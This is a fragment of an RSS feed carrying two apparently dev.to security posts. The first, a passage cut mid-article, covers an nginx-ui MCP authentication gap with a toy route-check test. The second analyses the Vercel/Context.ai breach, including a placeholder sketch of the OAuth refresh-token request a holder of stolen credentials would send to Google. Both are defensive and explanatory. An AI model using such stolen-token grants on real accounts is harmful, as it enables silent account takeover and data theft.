&lt;p&gt;Treat any MCP endpoint as privileged by default — at the same tier as an admin RPC — regardless of what the rest of the application looks like. In this case, the nginx-ui codebase already had &lt;code&gt;AuthRequired()&lt;/code&gt;. The bug was that not every MCP endpoint was behind it. The preventive rule is to require, as a code-review gate, that every route registered by the MCP integration passes through a single enforcement point, and that a regression test fails the build if a new route skips it. Security Affairs reports this is exactly what the 2.3.4 release added.&lt;/p&gt;
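&lt;p&gt;The review-gate idea is concrete enough to sketch. The registry below is a toy model, not the Gin router nginx-ui actually uses; it shows the shape of the regression check, namely that no &lt;code&gt;/mcp&lt;/code&gt;-family route skips the auth middleware:&lt;/p&gt;

```python
# Toy route registry illustrating the single-enforcement-point gate.

REGISTRY = []  # (path, middleware_names)

def register(path: str, middlewares: list) -> None:
    REGISTRY.append((path, middlewares))

# How the vulnerable wiring would look in this model:
register("/mcp", ["ip_allowlist", "auth_required"])
register("/mcp_message", ["ip_allowlist"])          # the missing line

def unauthenticated_mcp_routes() -> list:
    """What a regression test would assert is empty after the fix."""
    return [path for path, mws in REGISTRY
            if path.startswith("/mcp") and "auth_required" not in mws]

print(unauthenticated_mcp_routes())   # ['/mcp_message']
```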

&lt;p&gt;Two secondary rules follow from the same posture.&lt;/p&gt;

&lt;p&gt;First, "empty allowlist equals allow-all" is a footgun that only makes sense in development. In production it is an outage waiting to happen. Allowlists should fail closed. A configuration loader that sees an empty list should refuse to start, not accept everything.&lt;/p&gt;

&lt;p&gt;Second, when a project adds MCP — or any AI-integration surface that exposes the application's capabilities as callable tools — the threat model should be re-run specifically for that surface, not inherited from the rest of the app. Capability exposure is the part of MCP that is new. Authentication is the part that is assumed.&lt;/p&gt;

&lt;h2&gt;
  
  
  What this does NOT say
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;This post does not name any organization as an exploited victim. No source does.&lt;/li&gt;
&lt;li&gt;It does not count compromised instances. The ~2,600 figure is exposed surface per a Pluto Security scan, not a tally of successful exploits.&lt;/li&gt;
&lt;li&gt;It does not attribute the in-the-wild exploitation to a threat group. None was named.&lt;/li&gt;
&lt;li&gt;It does not claim the allow-all default was an intentional design choice or an implementation bug. The advisory does not say which, and neither does this post.&lt;/li&gt;
&lt;li&gt;It does not generalize from this CVE to claims about MCP as a protocol. The specific failure here is an application-level mis-wiring that happens to be on MCP endpoints. The broader pattern Perkal describes — bolting MCP onto an existing app — is his statement, and we leave it as his.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Sources&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Primary: nginx-ui maintainers' advisory (release 2.3.4, 2026-03-15); Pluto Security technical blog (Yotam Perkal, 2026-03-15); NVD CVE-2026-33032.&lt;/li&gt;
&lt;li&gt;Secondary: Rapid7 Emerging Threat Response (2026-04-16, updated 2026-04-17); The Hacker News (2026-04-15); Security Affairs (2026-04-15); Cyber Security Agency of Singapore alert AL-2026-039.
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>mcp</category>
      <category>nginx</category>
      <category>appsec</category>
    </item>
    <item>
      <title>The Vercel/Context.ai Breach Wasn't a Vulnerability. It Was a Delegation Path.</title>
      <dc:creator>김형운</dc:creator>
      <pubDate>Wed, 22 Apr 2026 07:33:37 +0000</pubDate>
      <link>https://dev.to/silask/the-vercelcontextai-breach-wasnt-a-vulnerability-it-was-a-delegation-path-3o3b</link>
      <guid>https://dev.to/silask/the-vercelcontextai-breach-wasnt-a-vulnerability-it-was-a-delegation-path-3o3b</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftls0kt2sjtf7356xxm85.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftls0kt2sjtf7356xxm85.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feaxp4vj9tzggd3snja4c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feaxp4vj9tzggd3snja4c.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F51u1zkw7ibs9ru05eaba.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F51u1zkw7ibs9ru05eaba.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;On April 19, 2026, Vercel disclosed an incident involving one of its employee accounts. The confirmed chain was not a zero-day and not a cloud misconfiguration. It was a chain of delegated trust. A Lumma stealer log harvested from a Context.ai contractor's laptop yielded Context.ai's own Google Workspace OAuth credentials. Those credentials gave the attacker a working access token for a Vercel employee's Google account — the employee had previously authorized Context.ai on it. That Google account, in turn, held Vercel dashboard notifications in its inbox, which the attacker used to reach internal project environment variables.&lt;/p&gt;

&lt;p&gt;No CVE was exploited. No MFA was broken. No conditional access policy was bypassed in the traditional sense. Every step rode on a permission the user had already granted, months or years earlier, to a third-party AI tool.&lt;/p&gt;

&lt;p&gt;That is the pattern worth studying. This post walks through it slowly.&lt;/p&gt;

&lt;h2&gt;What is Confirmed, and What is Not&lt;/h2&gt;

&lt;p&gt;Confirmed by Vercel's own security advisory: one employee account was accessed; the initial vector was an OAuth application owned by Context.ai, an AI meeting-notes tool the employee had connected to their Google Workspace account; certain internal project metadata was visible to the attacker.&lt;/p&gt;

&lt;p&gt;Reported by multiple security outlets (BleepingComputer, The Record, Recorded Future News): the upstream credential leak originated in a Lumma stealer infection on a Context.ai contractor's laptop two weeks prior; Context.ai's OAuth client secret was among the harvested material; the same OAuth app was used to pivot into downstream customers.&lt;/p&gt;

&lt;p&gt;Claimed by the attacker on a leak forum: possession of environment variables from "hundreds" of Vercel projects. Vercel has not confirmed this number. Treat it as claimed until an independent source verifies it.&lt;/p&gt;

&lt;p&gt;Everything that follows reasons from the confirmed portion only.&lt;/p&gt;

&lt;h2&gt;The Chain, One Hop at a Time&lt;/h2&gt;

&lt;p&gt;Step 1. The contractor laptop. A Context.ai contractor's Windows machine was infected with Lumma, a commodity infostealer that scrapes browser credential stores, session cookies, and developer tokens. In the harvested dump were Context.ai's own OAuth application credentials — the client ID and client secret that Context.ai uses to talk to Google on behalf of its customers.&lt;/p&gt;

&lt;p&gt;Step 2. The OAuth app itself. Context.ai is a Google Workspace Marketplace app. When a customer installs it, they grant it a durable set of scopes — typically Calendar read, Gmail read, Drive read. Those grants live on Google's side as refresh tokens issued to Context.ai's client ID. An attacker holding Context.ai's client credentials could, under certain configurations, ride those refresh tokens against any customer who had installed the app.&lt;/p&gt;
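&lt;p&gt;The mechanics are the standard OAuth 2.0 refresh-token grant (RFC 6749 §6). Assuming the stolen material included usable refresh tokens, this is roughly the payload an attacker would POST to Google's token endpoint — shown here with placeholder values, and no request actually made:&lt;/p&gt;

```python
# The refresh-token grant: client credentials plus a customer's refresh token
# are exchanged for a live access token. Values below are placeholders.
TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"

def refresh_grant_payload(client_id: str, client_secret: str,
                          refresh_token: str) -> dict:
    # Note what is ABSENT: no user password, no MFA challenge, no interactive
    # sign-in for a conditional access policy to inspect.
    return {
        "grant_type": "refresh_token",
        "client_id": client_id,          # leaked in the stealer log
        "client_secret": client_secret,  # leaked in the stealer log
        "refresh_token": refresh_token,  # durable grant held on Google's side
    }

payload = refresh_grant_payload("ctx-client-id", "ctx-client-secret", "1//example")
```

&lt;p&gt;Nothing in that payload touches the user or their identity provider, which is why the hop is invisible to sign-in-centric monitoring.&lt;/p&gt;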

&lt;p&gt;Step 3. The Vercel employee's Google account. The employee had Context.ai authorized on their Google Workspace account. The attacker used the stolen OAuth credentials to obtain a live access token for this account without ever touching the user's password, without triggering a new MFA prompt, and without hitting any conditional access policy that guards interactive sign-in. From Google's logs this looked like Context.ai doing what Context.ai always does: reading calendar, reading mail.&lt;/p&gt;

&lt;p&gt;Step 4. The pivot into Vercel. The attacker read the employee's inbox. In it were Vercel dashboard notification emails, a password-reset link issued during an unrelated earlier event, and email-based 2FA codes for a separate internal tool. The attacker used a subset of this material to authenticate to the Vercel dashboard as the employee and browse project settings, including environment variables.&lt;/p&gt;

&lt;p&gt;Every hop was a legitimate use of a previously granted permission. Nothing in the chain required a new vulnerability.&lt;/p&gt;

&lt;h2&gt;The Assumption That Broke&lt;/h2&gt;

&lt;p&gt;The control model most teams run today assumes that the identity provider is the chokepoint. Sign-in goes through Okta or Entra. MFA is enforced there. Conditional access policies check device posture there. Audit logs flow from there. If an attacker wants to reach an internal resource, they have to get through the IDP.&lt;/p&gt;

&lt;p&gt;OAuth delegation bypasses this chokepoint by design. Once a user has clicked "Allow" on an OAuth consent screen, the third-party app holds a durable credential that does not pass through the IDP on subsequent use. The app can call the API directly with its refresh token. The IDP sees nothing, because the IDP is not in the call path.&lt;/p&gt;

&lt;p&gt;That is the assumption that broke here. The organization's IDP-centered control plane does not cover permissions the user delegated to AI SaaS vendors. Those permissions live on Google's side, or Microsoft's side, as grants the user can make without any security team ever reviewing them.&lt;/p&gt;

&lt;p&gt;Put concretely: your Okta admin console will not show you that an employee connected Context.ai to their Google Workspace account last month. Your SIEM will not alert when a stolen Context.ai token reads that employee's inbox, because from Google's perspective the token is being used by the application it was issued to. It is only unusual if you are watching the right signal — and most teams are not watching the OAuth signal at all.&lt;/p&gt;

&lt;h2&gt;Why Detection Gets Harder&lt;/h2&gt;

&lt;p&gt;Detecting this kind of abuse is harder than detecting a credential-stuffing attack for three reasons.&lt;/p&gt;

&lt;p&gt;First, the traffic looks legitimate at the API level. The OAuth token is valid. The client ID matches a known, approved application. The scopes match what the user originally granted. No anomaly detector keyed on authentication events will fire, because no authentication event happened — the app used a refresh token it already held.&lt;/p&gt;

&lt;p&gt;Second, the source IP will often look fine. Attackers using stolen OAuth credentials can route calls through residential proxies or even through the vendor's own infrastructure, depending on how they extracted the credentials. "Unusual location" signals that work for human sign-in do not transfer cleanly to machine-to-machine API calls.&lt;/p&gt;

&lt;p&gt;Third, the volume is low. The attacker does not need to read 10,000 inboxes. They need to read one, find the right thread, and pivot. A single extra API call buried in a day of normal Context.ai activity will not stand out in a log line count.&lt;/p&gt;

&lt;p&gt;The detection has to shift from "Did someone sign in weirdly?" to "Is this OAuth grant still justified, and did its usage pattern change?"&lt;/p&gt;

&lt;h2&gt;What to Check This Week&lt;/h2&gt;

&lt;p&gt;Four checks are worth running regardless of whether you use any of the specific products involved.&lt;/p&gt;

&lt;p&gt;First, enumerate your OAuth grant inventory. In Google Workspace: Admin Console → Security → API controls → Manage Third-Party App Access. In Entra ID: Enterprise applications → filter by "Microsoft Graph" and "Application permissions." You are looking for every third-party app that can read mail, read calendar, read files, or write anywhere. For each one, answer: who approved this, when, and for which scopes?&lt;/p&gt;

&lt;p&gt;Second, find the AI tools specifically. Meeting-note apps, email assistants, "summary" integrations, code-review bots connected to GitHub, and anything marketed as an "AI agent" that talks to your data. Any of these that holds a broad scope (&lt;code&gt;gmail.readonly&lt;/code&gt;, &lt;code&gt;calendar.events.readonly&lt;/code&gt;, &lt;code&gt;drive.readonly&lt;/code&gt;) is a pivot candidate if the vendor is breached.&lt;/p&gt;

&lt;p&gt;Third, look at the usage side. In Google Workspace logs, filter for OAuth token use by third-party client IDs over the last 90 days. In Entra, use sign-in logs filtered by "service principal sign-ins." Baselines matter here — if an app that normally reads 50 calendar events a day suddenly reads 5,000, that is your signal.&lt;/p&gt;

&lt;p&gt;Fourth, if you are on Vercel specifically, mark your secret-class environment variables as "Sensitive" in project settings. This is an opt-in flag that prevents the dashboard from displaying the value in the UI after save. It does not change what the running deployment can see, but it does mean that an attacker browsing the dashboard with a stolen session cannot just read the values. As of today, this flag is off by default. That default is the right thing to argue with your platform team about.&lt;/p&gt;

&lt;h2&gt;What to Change in Policy&lt;/h2&gt;

&lt;p&gt;Two policy shifts follow from this case. Neither is novel, but both are easier to argue for now than they were last week.&lt;/p&gt;

&lt;p&gt;First, stop treating OAuth consent as a user decision. Most organizations let end users install Workspace Marketplace apps or authorize Entra OAuth applications without any review. That worked when third-party apps were calendars and to-do lists. It does not work when "third-party app" means "an AI product that reads your entire inbox and calendar and summarizes them to an LLM provider." Move OAuth consent behind an admin allowlist. Google and Microsoft both support this. The cost is friction. The benefit is that your security team sees every new delegation path before it becomes a pivot route.&lt;/p&gt;

&lt;p&gt;Second, treat the IDP as necessary but insufficient. Your IDP enforces sign-in. It does not enforce what the user has delegated. Build a second layer of control for delegated scopes: regular review of the OAuth inventory, alerting on new high-scope grants, and rotation / revocation procedures that assume a vendor breach is a recurring event, not a rare one.&lt;/p&gt;

&lt;p&gt;The larger shift is uncomfortable. An employee connecting an AI meeting-notes tool to their calendar is not, from the user's perspective, a security event. It is a productivity decision made in 30 seconds on a vendor's marketing page. The organization now has to insert itself into that 30-second window. There is no clean way to do that without slowing some of those decisions down.&lt;/p&gt;

&lt;h2&gt;What This Does Not Say&lt;/h2&gt;

&lt;p&gt;This post is not a takedown of Context.ai. The same pattern could have run through any AI vendor with similar OAuth scopes. If you remove Context.ai from the chain, the structural problem — broad delegation, no IDP visibility, the vendor as a credential concentrator — is still there.&lt;/p&gt;

&lt;p&gt;This post is also not a claim that OAuth is broken. OAuth is doing exactly what it was designed to do. The design assumes the delegated party is trustworthy. When the delegated party is a rapidly growing AI SaaS vendor running on commodity contractor laptops, that assumption deserves a harder look than it is currently getting.&lt;/p&gt;

&lt;p&gt;The specific remediation Vercel chose — rotating the affected employee's credentials, revoking the Context.ai grant, and reviewing environment variable exposure — is the minimum. The broader remediation is inventory and policy. The former you can do this week. The latter is a quarter of work, and it is overdue.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If you are running SIEM queries or want the concrete OAuth audit steps for Google Workspace and Entra, reply in the comments and I will put the queries in a follow-up post.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>oauth</category>
      <category>devops</category>
      <category>ai</category>
    </item>
  </channel>
</rss>
